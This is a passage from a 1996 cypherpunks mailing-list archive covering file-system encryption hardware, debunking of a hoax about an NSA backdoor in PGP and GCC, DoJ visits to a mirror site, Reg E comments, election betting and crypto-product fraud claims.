too much time with these nutcases, and I assure you, Mr. Smith, they are very real.

>	In other words, go back to the drawing board and find something else to
>try to sound a tocsin over.
>	-AllenOpen up your world, Mr. Smith.  There is a whole parallel universe of garbage that exists with yours.    
Whether or not you believe or understand that is frankly irrelevant to me or my work.  But hopefully this 
will open your eyes to the fact that this is not about evil governments, nor military spookery, nor 
commercialization, nor fear of crackers.  The next time I have to travel to a bomb site, and as I try and 
figure out what cause could justify the death of someone who just happens to be in the wrong place at the 
wrong time, I will not be thinking of you in your office lecturing me on the computer world.

Barry C. Collin
-- 
Institute for Security and Intelligence
A Non-Profit Research Institution
P.O. Box 9877
Stanford, California  94309-9877  USA




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Douglas R. Floyd" <dfloyd@io.com>
Date: Thu, 29 Aug 1996 06:33:51 +0800
To: adamsc@io-online.com
Subject: Re: File System Encryption
In-Reply-To: <19960828165105171.AAA175@IO-ONLINE.COM>
Message-ID: <199608281823.NAA14144@bermuda.io.com>
MIME-Version: 1.0
Content-Type: text/plain


> 
> On Tue, 27 Aug 1996 09:01:03 -0500 (CDT), Douglas R. Floyd wrote:

> 
> Better yet, patch some stuff onto a spare power supply cable so that a small
> siren would go off on a reboot and then use those security bolts to hold the
> case on.  That would probably discourage someone from rebooting off a floppy.

I just unplugged the floppy drive power cable, and disabled it in the
BIOS.  Even if they reboot the box, the drive will be inaccessable... all
they will have is a file called bigrandseed which holds the data in it.

As for case protection, the best thing to do is have a tamper switch which
shuts the box off if opened.

> 
> >someone has the permissions to access the files through the network, the
> >files are inaccessable ;-).
> 
> Neat idea, and a great use for all the linux security patches we've heard
> about.

One thing I think I can use this for is making a "lock box" for holding a
PGP key for signing/decrypting stuff.  Attach a keyboard, and on boot,
have the PGP key decrypted into a RAM drive.  Then, have a key switch on
the case and a wrapper on PGP to detect this.  E-mail what you want
signed, turn the key, and it emails the signed/decoded file back.  Someone
opens the machine, tamper switch turns the box off.  Box off?  Key is now
left in encrypted state, most likely hidden in one of the many sound
files...

Sounds like a nice saturday afternoon project.

OBSecurityAlert:

Have people updated their Sendmail yet?  Another security alert went out
on it yesterday...





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Thu, 29 Aug 1996 05:12:23 +0800
To: "Michael T. Babcock" <mbabcock@tyenet.com>
Subject: Re: Key Exchange Request
In-Reply-To: <199608280446.AAA01992@spirit.hks.net>
Message-ID: <Pine.SUN.3.94.960828132147.10485A-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain



This really does not belong on the list.
We have enough bandwidth problems without unsolicited key blocks being
forwarded to the list.


On Wed, 28 Aug 1996, Michael T. Babcock wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
> 
> Type Bits/KeyID    Date       User ID
> pub  1280/FA4C5DB1 1996/06/13 Michael T. Babcock <mbabcock@tyenet.com>
>                               Michael T. Babcock <mbabcock@cyberbeach.net>

[...]

> - -----BEGIN PGP PUBLIC KEY BLOCK-----
> Version: 2.6.3i
> Comment: http://www.cyberbeach.net/~mbabcock/PGP/
> 
> mQCtAzHAhC8AAAEFAMG+C+yN8q7KDT5TUSdyQNZlDDlTGuF4vUzPEq52lrqx7NAA

[...]

> qd98jWjPf38BgLOldtanlYiYfSBcVIdO
> =N34I
> - -----END PGP PUBLIC KEY BLOCK-----

> -----BEGIN PGP SIGNATURE-----
> Version: 2.6.2
> Comment: Gratis auto-signing service

[...]

> -----END PGP SIGNATURE-----
> 

--
I hate lightning - finger for public key - Vote Monarchist
unicorn@schloss.li





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adamsc@io-online.com (Adamsc)
Date: Thu, 29 Aug 1996 08:19:19 +0800
To: "Eric Murray" <Scottauge@aol.com>
Subject: Re: SCO giving free licenses to UNIX OpenServer
Message-ID: <19960828203549890.AAA88@IO-ONLINE.COM>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 28 Aug 1996 08:37:26 -0700 (PDT), Eric Murray wrote:

>> Hit www.sco.com

>> Pick What's New
>> 
>> Look for UNIX Unbound.
>> 
>> Read, Understand, and Delight... Microsoft maybe in trouble at last.

>I doubt it.  People don't use Microsoft products because
>of their quality or functionality.

OTOH, it might get people to play around with another alternative to NT.

>> This is for single user home based UNIX systems.


>Single-user UNIX isn't all that useful.


>Linux and FreeBSD are both free, and come with source code.
>You can get "commercial" versions of Linux for around $30
>(that's on CDROM).  You can get support for Linux, and probably
>for FreeBSD.

True.  However, if you have odd-ball hardware (like my RAID controller) it
*will* come with an SCO driver.  I'd have to write my own to use it under
Linux.

/ If you think education is expensive, try ignorance.
/ Home: Chris Adams <adamsc@io-online.com> | http://www.io-online.com/adamsc/adamsc.htp
/ Autoresponder: send email w/subject of "send resume" or "send PGPKEY"
/ Work: cadams@acucobol.com | V.M. (619)515-4894 | (619)689-6579
/ Member in good standing of the GNU whirled hors d'oeuvre





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Chip Mefford <cmefford@avwashington.com>
Date: Thu, 29 Aug 1996 04:52:21 +0800
To: anonymous-remailer@shell.portal.com
Subject: Re: Real or Not ?
In-Reply-To: <199608281157.EAA04520@jobe.shell.portal.com>
Message-ID: <v03007800ae4a3360faa4@[207.79.65.35]>
MIME-Version: 1.0
Content-Type: text/plain


>I snagged this off a news group this AM.. comments??
>
>A lot of people think that PGP encryption is unbreakable and that the
>NSA/FBI/CIA/MJ12 cannot read their mail. This is wrong, and it can be a
>deadly mistake. In Idaho, a left-wing activist by the name of Craig Steingold
>was arrested  _one day_ before he and others where to stage a protest at
>government buildings; the police had a copy of a message sent by Steingold
>to another activist, a message which had been encrypted with PGP and sent
>through E-mail.


I suppose this part could be true.
>
> Since version 2.1, PGP ("Pretty Good Privacy") has been rigged to
>allow the NSA to easily break encoded messages. Early in 1992, the author,
>Paul Zimmerman, was arrested by Government agents. He was told that he
>would be set up for trafficking narcotics unless he complied. The Government
>agency's demands were simple: He was to put a virtually undetectable
>trapdoor, designed by the NSA, into all future releases of PGP, and to
>tell no-one.

Phil Zimmerman has been shown to be a person of remarkable personal
integrity and
since he was up on and beat charges of illegally exporting munitions, I
some how find a
lame threat of a frame up for narcotic trafficking as making him cave to
the "shadowy" government
wishes a bit hard to swallow.


>
> snip<
> Members of the boards of Novell, Microsoft,
>Borland, AT&T and other companies were persuaded into giving the order for
>the modification (each ot these companies' boards contains at least one
>Trilateral Commission member or Bilderberg Committee attendant).

Oh yeah, sorry, I forgot that the all powerful TC was behind it all, so of
course its true.

>
> It took the agency more to modify GNU C, but eventually they did it.
>The Free Software Foundation was threatened with "an IRS investigation",
>in other words, with being forced out of business, unless they complied. The
>result is that all versions of GCC on the FTP sites and all versions above
>2.2.3, contain code to modify PGP and insert the trapdoor. Recompiling GCC
>with itself will not help; the code is inserted by the compiler into
>itself. Recompiling with another compiler may help, as long as the compiler
>is older than from 1992.

Somehow, I just don't see the FSF collaborating and caveing to threats.
Also please note that
all of this code under discussion has been and is constantly being reviewed
by some of these here fine folks
and thus far, ain't no one found this often rumored secret back door, but
then again, I am quite sure the TC is behind the coverup.

have a day
in fact,
they're cheap, have 2

chipper








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stewarts@ix.netcom.com
Date: Thu, 29 Aug 1996 11:33:22 +0800
To: cypherpunks@toad.com
Subject: Mimic Function Stego Programs?
Message-ID: <199608282111.RAA17052@cbig1.att.att.com>
MIME-Version: 1.0
Content-Type: text/plain


Does anybody have a stego program along the lines of Peter Wayner's
Mimic Functions?  I'm looking for something that you can hand a grammar
and a set of bits that will produce sentences in the grammar,
plus a decoder that can take the sentences and reconstruct the bits.
I have a friend who lives in a kleptocratic country where the local
bureaucrats have made it clear they'll confiscate the main email node
in his town if they catch traffic they recognize as encrypted,
and text in some non-popular language may be less obvious than, say,
Mandelbrot sets with stego-bits or other artwork.


-----
PHB would work ok...
http://www.unitedmedia.com/comics/dilbert/archive/dilbert960821-9577.gif
-----


#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# <A HREF="http://idiom.com/~wcs"> 	Reassign Authority!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stewarts@ix.netcom.com
Date: Thu, 29 Aug 1996 09:28:44 +0800
To: Simon Spero <ses@tipper.oit.unc.edu>
Subject: Re: Today's Dilbert
Message-ID: <199608282111.RAA17084@cbig1.att.att.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:12 AM 8/22/96 -0400, you wrote:
>I can't believe nobody mentioned wednesday's dilbert cartoon..

Because we missed it in the papers and were waiting for it to
show up on the web site?

http://www.unitedmedia.com/comics/dilbert/archive/dilbert960821-9577.gif

#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# <A HREF="http://idiom.com/~wcs"> 	Reassign Authority!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <rich@c2.org>
Date: Thu, 29 Aug 1996 09:53:48 +0800
To: fight-censorship@vorlon.mit.edu
Subject: Re: Scoring Politicians on Digital Liberty Issues (Re: Net Politics)
In-Reply-To: <Pine.BSI.3.91.960828120051.16596A-100000@dcez.nicom.com>
Message-ID: <Pine.GUL.3.95.960828142934.7901C-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 28 Aug 1996, Keith Glass wrote:

> Pick 10-20 issues/votes.  Rate each congresscritter AND THEIR OPPONENTS 
> based on "our" stand on the issues. Give a numerical score, based on 
> percentage of "correct" positions.

I don't think an overall numerical score would be very useful, given the
inevitable squabbling over how to weight different questions. Leahy voted
for DT and against CDA; Burns voted for CDA and against DT. Who is worse?

NOTE: The above is intended as a rhetorical question!

-rich





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@eff.org>
Date: Thu, 29 Aug 1996 11:36:28 +0800
To: Eric Murray <ericm@lne.com>
Subject: Re: Real or Not ?
In-Reply-To: <199608281530.IAA20721@slack.lne.com>
Message-ID: <Pine.SUN.3.91.960828150721.9155B-100000@eff.org>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 28 Aug 1996, Eric Murray wrote:

> Heh.  They forgot the Black Heliocopters manned by agents of
> the UN/New World Order, and the Greys from Zeta Reticuli..
> 
> It's a hoax, with several clues that it is a hoax in it.
> 
> Of course you're welcome to prove me wrong by disassembling
> a PGP binary.  Examination of the random numnber generator, IDEA
> key setup, or RSA key setup vs what's in the source code
> should show if something fishy is going on.

Unless of course the program you're using to view the disassembled 
instructions has also been altered by the TriLats. And make sure you use 
any pre-1992 compiler on a pre-1992 operating system on a computer that's 
not hooked up to the Net or even located where NSA agents can get to it.

"Steingold" was a nice touch.

-Declan


// declan@eff.org // I do not represent the EFF // declan@well.com //






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adamsc@io-online.com (Adamsc)
Date: Thu, 29 Aug 1996 11:33:41 +0800
To: "Igor Chudov" <jimbell@pacifier.com>
Subject: Re: Edited Edupage, 18 Aug 1996 [SATELLITES]
Message-ID: <19960828221039187.AAA43@IO-ONLINE.COM>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 27 Aug 1996 15:46:13 -0500 (CDT), Igor Chudov @ home wrote:

>> >I'd worry far more about the stresses of launch bothering
>> >the drives.
>> 
>> That's not a problem at all.  Most modern drives are rated for 10's 
>> of G's, non-operating.  Satellite launches are probably a breeze 
>> compared to this.

>I remember reading that Russian satellite launches with people aboard
>had acceleration of about 9-10G.

Since when do satellites have people on board? (Or was this some new way of
silencing politcal prisoners?)

/ If you think education is expensive, try ignorance.
/ Home: Chris Adams <adamsc@io-online.com> | http://www.io-online.com/adamsc/adamsc.htp
/ Autoresponder: send email w/subject of "send resume" or "send PGPKEY"
/ Work: cadams@acucobol.com | V.M. (619)515-4894 | (619)689-6579
/ Member in good standing of the GNU whirled hors d'oeuvre





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Richard Charles Graves <llurch@networking.stanford.edu>
Date: Thu, 29 Aug 1996 10:39:02 +0800
To: cypherpunks@toad.com
Subject: There is no Agent Toby Tyler at the FBI [UK Observer Story]
Message-ID: <199608282217.PAA08317@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


...two different sources, both of whom are anonymous because they work for
competing newspapers, tell me.

Could someone else with contacts/time to kill/attributability please confirm
this?

Kinda puts a dent in the whole story, don't you think.

-rich




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Will Rodger <rodger@interramp.com>
Date: Thu, 29 Aug 1996 08:32:21 +0800
To: cypherpunks@toad.com
Subject: Re: DoJ is poking around
Message-ID: <1.5.4.32.19960828192508.0067abc4@pop3.interramp.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 03:42 AM 8/29/96 +1000, Skeeve Stevens wrote:
>
>Im running a mirror of the DoJ site on http://www.skeeve.net/doj/
>
>It has had some 14000 hits or so since I put it up.. so I installed a stats
>package to see where they were coming from...
>
>low and behold!
>
>US Government
>wdcsun1.usdoj.gov 
>       09:07:07 /doj/ 
>
>wdcsun1.usdoj.gov unknown - [28/Aug/1996:09:07:07 +1000] "GET /doj/
HTTP/1.0" 20
>0 8416
>
>also
>
>US Military
>palisade.spacecom.af.mil 
>       07:21:50 /doj/ 
>       08:30:51 /doj/ 
>
>
>looks like the DoJ have been looking around at the mirrors.. maybe to 
>legally hassle people about them....
>

Or, just maybe, some DoJ employees wanted to see what folks on the outside
were doing to tweek their bosses:-)? Reminds me of the *thousands* of hits
the "Intel Secrets Page"(http://www.x86.org/) has gotten from users at
intel.com since it went up. True, Intel was considering legal action against
the site, but there's almost no way all those hits are from Mr. Grove's
investigators....

Will Rodger

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMiTHI0cByjT5n+LZAQFObAf9G1fBFETkuWL5mlTmKb2RwLTs/HyTGML7
c8nSdpS+Hsj/I+ofvqUHn07ahulsr+kDLWQmmR3JHFKlT0KCsfydmAn0CvjTVRw+
dyeRTFzxW5fbcmwLBpzmijKllQjoEa7GiM3kUgaGb7MYqssnDoa5YDIA9jYtFvTY
3cKymCiyqNUGWTsskLLAS8zjClIH9q9yF6qq+unY66PyRo44dUGkDH6L1Jd4AOZ6
b/Mgphj3oW59veX/scfxKcLlMAnxvJoLpdlLysJHeU2jhVB/tjRneAxNxZqCTFi8
uVXpPbL568V1xR9uyxmaZbbQqG7+0PgEj+kW5r99zvTZfd0fMd6irA==
=EwSd
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Thu, 29 Aug 1996 08:39:28 +0800
To: cypherpunks@toad.com
Subject: Reg E changes
Message-ID: <v03007809ae4a16f27053@[206.119.69.46]>
MIME-Version: 1.0
Content-Type: text/plain



--- begin forwarded text


Mime-Version: 1.0
Date: Wed, 28 Aug 1996 11:21:09 -0700
To: rah@shipwright.com
From: Somebody
Subject: Reg E changes

Bob,

If you have not already done so, please submit a public comment re: the
proposed Reg E changes [Docket No. R-0919]. The deadline is September 7th.
You may want to announce this to other fans of bearer certs. 

Thanks to my friends at the Fed, I am in possession of comments already
submitted. The opposition is trying to get the Fed to not make the proposed
account/non-account based distinction when deciding what is covered under
Reg E, but instead use a $ cap. The logic is that there is an account
anyway, be it on the card (such as the record of the total on a prepaid card
that is used for paying subway fares) or be it at the bank.

We need to make sure that the supporters of non-book entry systems make
their voices heard.

When writing the comment, please include a request to do away with the hard
copy signature requirements for opening accounts. If the Fed gets enough
requests, they will include it in the next round of proposals.



-- Somebody

--- end forwarded text



-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"'Bart Bucks' are not legal tender."
                -- Punishment, 100 times on a chalkboard,
                       for Bart Simpson
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: youssefy@ucla.edu
Date: Thu, 29 Aug 1996 09:25:28 +0800
To: cypherpunks@toad.com
Subject: Cypherpunks Lite
Message-ID: <2.2.32.19960828225105.006ccc74@pop.ben2.ucla.edu>
MIME-Version: 1.0
Content-Type: text/plain


There was a posting by someone about three weeks ago that gave the address
for a person who ran a filtered version of the cypherpunks list, can someone
please repost that information?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Osborne, Rick" <OSBORRI@msmail.northgrum.com>
Date: Thu, 29 Aug 1996 08:32:44 +0800
To: Cypherpunks <cypherpunks@toad.com>
Subject: RE: Real or Not ?
Message-ID: <3224A9B8@smtpmmp2.northgrum.com>
MIME-Version: 1.0
Content-Type: text/plain



I think we all know this is fake.  I saw the original web page out there 
(search lycos for "pgp crack" to find it) and it originally had an extra 
line at the end (tactfully ommitted, I see) which said something to the 
effect of "In case you couldn't tell, this is a joke!"

 -oz
 ----------
Subject: Real or Not ?
Date: Wednesday, August 28, 1996 7:57AM

I snagged this off a news group this AM.. comments??

A lot of people think that PGP encryption is unbreakable and that the
[...]




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James C. Sewell" <jims@MPGN.COM>
Date: Thu, 29 Aug 1996 09:08:45 +0800
To: Black Unicorn <unicorn@schloss.li>
Subject: Re: libelous action
Message-ID: <3.0b11.32.19960828165224.006a27ec@central.tansoft.com>
MIME-Version: 1.0
Content-Type: text/enriched

At 02:57 AM 8/27/96 -0400, Black Unicorn wrote:
>I would remind you that each and every sale you make of this product, when
>based on material misrepresentation, constitutes a fraud.  If made by
>wire, as these sales seem they may, they represent wire fraud.  That's one
>count of fraud and one count of wire fraud.  If a check is sent to you via
>mail, that's a count of mail fraud to boot.
>

Wow, imagine what would happen if a bunch of "in-the-know" folks bought
a product like this under the claims to strong crypto and then found out 
they were fooled!  With charges like these a guy could get into real trouble.

I sure hope Mr. Holt isn't personally accountable.  He sounds like a
real swell guy.  It would be a shame for him to go to prison for what is
obviously his misunderstanding of what is cryptographically strong and 
what is a pitiful excuse for a product.

Of course I've never seen his product so I don't know which category it 
falls into, but it would be a shame.

Disclaimer:  I may or may not be serious.  I have made no direct claims
so whose to say what my intentions are in posting this ;\)



Jim Sewell - Programmer               Tantalus Inc.
jims@tansoft.com               Key West, FL  33040
Amateur Radio:  KD4CKQ            801 Eisenhower Drive
Compu$erve: 71061,1027         Multi-player computer games




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hans "Unicorn" Van de Looy <hvdl@sequent.com>
Date: Thu, 29 Aug 1996 02:38:42 +0800
To: anonymous-remailer@shell.portal.com
Subject: Re: Real or Not ?
In-Reply-To: <199608281157.EAA04520@jobe.shell.portal.com>
Message-ID: <9608281505.AA10933@amsqnt.nl.sequent.com>
MIME-Version: 1.0
Content-Type: text/plain


The one-and-only anonymous-remailer@shell.portal.com once stated:
! I snagged this off a news group this AM.. comments??

[ Part of previous message deleted ]

!  It took the agency more to modify GNU C, but eventually they did it.
! The Free Software Foundation was threatened with "an IRS investigation",
! in other words, with being forced out of business, unless they complied. The
! result is that all versions of GCC on the FTP sites and all versions above 
! 2.2.3, contain code to modify PGP and insert the trapdoor. Recompiling GCC
! with itself will not help; the code is inserted by the compiler into
! itself. Recompiling with another compiler may help, as long as the compiler
! is older than from 1992.

I vote for Bogus,  since it resembles too much a  story from the ancient
days of UNIX.

This story  stated that Ken  Thompson modified  the UNIX CC  compiler to
include  a trapdoor  in  each version  of  (I think  it  was) the  login
program, thus ensuring the placement of a trapdoor enabling him to enter
each  and every  system.   After  that (since  all  compiler passes  are
written in C)  he modified the compiler to include  this code (to modify
the login  program) into the  compiler and compiled the  compiler, after
which he destroyed the original sources.

Hope this story will not become the next "Good Time Virus" story or some
similar hoax...

-- 

GreetZ,
Unicorn.

==== _ __,;;;/ TimeWaster on http://www.IAEhv.nl/users/hvdl ============
  ,;( )_, )~\| Hans "Unicorn" Van de Looy   PGP: ED FE 42 22 95 44 25 D8
 ;; //  `--;   GSM: +31 653 261 368              BD F1 55 AA 04 12 44 54
'= ;\ = | ==== finger hvdl@sequent.com for more info ===================





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Corey Minter <cminter@mipos2.intel.com>
Date: Thu, 29 Aug 1996 10:55:27 +0800
To: cypherpunks@toad.com (Cypherpunks List)
Subject: Re: DoJ is poking around
Message-ID: <199608290016.RAA26240@zws379.sc.intel.com>
MIME-Version: 1.0
Content-Type: text/plain


Forwarded message:
> >looks like the DoJ have been looking around at the mirrors.. maybe to
> >legally hassle people about them....
> 
> Or, just maybe, some DoJ employees wanted to see what folks on the outside
> were doing to tweek their bosses:-)? Reminds me of the *thousands* of hits
> the "Intel Secrets Page"(http://www.x86.org/) has gotten from users at
> intel.com 

exactly.  watch out, some DoJ revisionist might get into your mirror
site and get you back for trying to keep a history of the incident :).
well... maybe not.

-- 
______________________________________________________________________
Corey Minter | cminter@mipos2.intel.com 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
I wish I had a dollar for every time I spent a dollar, because then,
Yahoo!, I'd have all my money back.  --Jack Handy




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Daniel Hagerty <hag@ai.mit.edu>
Date: Thu, 29 Aug 1996 09:55:23 +0800
To: Chip Mefford <cmefford@avwashington.com>
Subject: Re: Real or Not ?
In-Reply-To: <199608281157.EAA04520@jobe.shell.portal.com>
Message-ID: <199608282125.RAA26272@galapas.ai.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


 > > It took the agency more to modify GNU C, but eventually they did it.
 > >The Free Software Foundation was threatened with "an IRS investigation",
 > >in other words, with being forced out of business, unless they complied. The
 > >result is that all versions of GCC on the FTP sites and all versions above
 > >2.2.3, contain code to modify PGP and insert the trapdoor. Recompiling GCC
 > >with itself will not help; the code is inserted by the compiler into
 > >itself. Recompiling with another compiler may help, as long as the compiler
 > >is older than from 1992.

    Umm, no.  I work for the Foundation in my copious free time.  This
has never happened.  And I just asked Richard about it to be sure.  He
was amused.
    It would be *very* difficult to pass this by anyone.  People at
FSF diff the source code a lot, and we're far from the only ones.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Charley Sparks <charley@clark.net>
Date: Thu, 29 Aug 1996 09:29:06 +0800
To: Scottauge@aol.com
Subject: Re: SCO giving free licenses to UNIX OpenServer
Message-ID: <199608282125.RAA16547@clark.net>
MIME-Version: 1.0
Content-Type: text/plain


When SCO is as good as Linux with all the free support I'll waste the 
bandwidth or the $15 for the CD




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Thu, 29 Aug 1996 11:46:36 +0800
To: Gary Howland <gary@systemics.com>
Subject: Re: A _REALLY_ Interesting Bet
In-Reply-To: <32246E57.7D55368C@systemics.com>
Message-ID: <Pine.SUN.3.94.960828175406.25479A-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 28 Aug 1996, Gary Howland wrote:

> Anonymous wrote:
> > 
> > Betting on football is one thing, but some of us would be very
> > interested in the odds on US presidential election outcomes as
> > November approaches. This kind of betting is illegal here, and
> > I haven't looked lately for a "Ladbroke's" type site, but it is
> > interesting because the betting odds from across the Atlantic
> > more closely match eventual election results than the annoying
> > calls from Gallup & Roper during suppertime. I have posted here,
> > anonymously, on this topic before, but some of you are aware of
> > who I am. I'll thank you to keep that a secret. ;}
> 
> Thinking about this some more - what would people want to see in such a
> betting system.  Would you be happy with two choices?:
> 
> 	(Clinton/Dole) or Other
> 
> or three choices?:
> 
> 	Clinton, Dole or Other
> 
> or would you want more choices than this?  I'm asking, since we've been
> tossing around this presidential election idea for a few days now, but
> since we're not Americans, we're not too sure what is a suitable set
> (bearing in mind that our idea for this will get more difficult as the
> number of choices increases).

Are these issues not listed currently on the IDEA FUTURES exchange?

Anyone have the URL?

> 
> Gary
> --
> pub  1024/C001D00D 1996/01/22  Gary Howland <gary@systemics.com>
> Key fingerprint =  0C FB 60 61 4D 3B 24 7D  1C 89 1D BE 1F EE 09 06
> 

--
I hate lightning - finger for public key - Vote Monarchist
unicorn@schloss.li





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Thu, 29 Aug 1996 12:37:18 +0800
To: "James C. Sewell" <jims@MPGN.COM>
Subject: Re: libelous action
In-Reply-To: <3.0b11.32.19960828165224.006a27ec@central.tansoft.com>
Message-ID: <Pine.SUN.3.94.960828175519.25479B-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 28 Aug 1996, James C. Sewell wrote:

> At 02:57 AM 8/27/96 -0400, Black Unicorn wrote:
> 
> >I would remind you that each and every sale you make of this product, when
> 
> >based on material misrepresentation, constitutes a fraud.  If made by
> 
> >wire, as these sales seem they may, they represent wire fraud.  That's one
> 
> >count of fraud and one count of wire fraud.  If a check is sent to you via
> 
> >mail, that's a count of mail fraud to boot.
> 
> >
> 
> 
>  Wow, imagine what would happen if a bunch of "in-the-know" folks bought
> 
> a product like this under the claims to strong crypto and then found out 
> 
> they were fooled!  With charges like these a guy could get into real trouble.
> 
> 
>  I sure hope Mr. Holt isn't personally accountable.  He sounds like a
> 
> real swell guy.  It would be a shame for him to go to prison for what is
> 
> obviously his misunderstanding of what is cryptographically strong and 
> 
> what is a pitiful excuse for a product.

This would depend on whether Mr. Holt had made a reasonable assessment of
the claims made by the author of the product before claiming that the
product was exceptional or "unbreakable."

I might note that the FTC is showing increased interest in cryptography
products and the claims of their marketers.

> 
> 
>   Of course I've never seen his product so I don't know which category it 
> 
> falls into, but it would be a shame.
> 
> 
> Disclaimer:  I may or may not be serious.  I have made no direct claims
> 
>              so whose to say what my intentions are in posting this ;\)
> 
> 
> 
> 
>   Jim Sewell - Programmer               Tantalus Inc.
> 
>      jims@tansoft.com               Key West, FL  33040
> 
>   Amateur Radio:  KD4CKQ            801 Eisenhower Drive
> 
>   Compu$erve: 71061,1027         Multi-player computer games
> 
> 
> 

--
I hate lightning - finger for public key - Vote Monarchist
unicorn@schloss.li





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Anonymous MacDonald <remailer@cypherpunks.ca>
Date: Thu, 29 Aug 1996 12:47:57 +0800
To: cypherpunks@toad.com
Subject: Not PGP, PGPfone!
In-Reply-To: <199608281157.EAA04520@jobe.shell.portal.com>
Message-ID: <199608290102.SAA07316@abraham.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


>  Since version 2.1, PGP ("Pretty Good Privacy") has been rigged to 
> allow the NSA to easily break encoded messages. Early in 1992, the author, 
> Paul Zimmerman, was arrested by Government agents. He was told that he 
> would be set up for trafficking narcotics unless he complied. The Government 
> agency's demands were simple: He was to put a virtually undetectable 
> trapdoor, designed by the NSA, into all future releases of PGP, and to
> tell no-one.

This is wrong, and easily disproven.  There was no way to put a trap
door in PGP because the source code was made publically available.
Modifying every C compiler in the world is just not realistic.

However, the situation has become considerably different with PGPfone.
Source code to PGPfone is kept extremely secret.  A few outsiders may
be given the source to review, but they will not be allowed to compile
and distribute it.  Only binaries of PGPfone compiled by the authors
will be available.  Some interesting portions of the program have even
been intentionally obfuscated to make them extremely difficult to
disassemble and analyze.

With PGPfone, a back would be considerably easier to install...




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Gary Howland <gary@systemics.com>
Date: Thu, 29 Aug 1996 03:45:51 +0800
To: Anonymous <nobody@zifi.genetics.utah.edu>
Subject: Re: A _REALLY_ Interesting Bet
In-Reply-To: <199608272002.OAA27298@zifi.genetics.utah.edu>
Message-ID: <32246E57.7D55368C@systemics.com>
MIME-Version: 1.0
Content-Type: text/plain


Anonymous wrote:
> 
> Betting on football is one thing, but some of us would be very
> interested in the odds on US presidential election outcomes as
> November approaches. This kind of betting is illegal here, and
> I haven't looked lately for a "Ladbroke's" type site, but it is
> interesting because the betting odds from across the Atlantic
> more closely match eventual election results than the annoying
> calls from Gallup & Roper during suppertime. I have posted here,
> anonymously, on this topic before, but some of you are aware of
> who I am. I'll thank you to keep that a secret. ;}

Thinking about this some more - what would people want to see in such a
betting system.  Would you be happy with two choices?:

	(Clinton/Dole) or Other

or three choices?:

	Clinton, Dole or Other

or would you want more choices than this?  I'm asking, since we've been
tossing around this presidential election idea for a few days now, but
since we're not Americans, we're not too sure what is a suitable set
(bearing in mind that our idea for this will get more difficult as the
number of choices increases).

Gary
--
pub  1024/C001D00D 1996/01/22  Gary Howland <gary@systemics.com>
Key fingerprint =  0C FB 60 61 4D 3B 24 7D  1C 89 1D BE 1F EE 09 06




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: backdraft@earthlink.net (Back Draft)
Date: Thu, 29 Aug 1996 12:53:33 +0800
To: cypherpunks@toad.com
Subject: desubscribe
Message-ID: <v01530500ae4aadf67f28@[206.149.196.100]>
MIME-Version: 1.0
Content-Type: text/plain


I would like you to desubscribe me from you mailing list






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Thu, 29 Aug 1996 12:41:20 +0800
To: "Douglas R. Floyd" <dfloyd@io.com>
Subject: Re: File System Encryption
In-Reply-To: <199608281536.KAA07426@bermuda.io.com>
Message-ID: <Pine.LNX.3.95.960828183758.773A-100000@gak>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

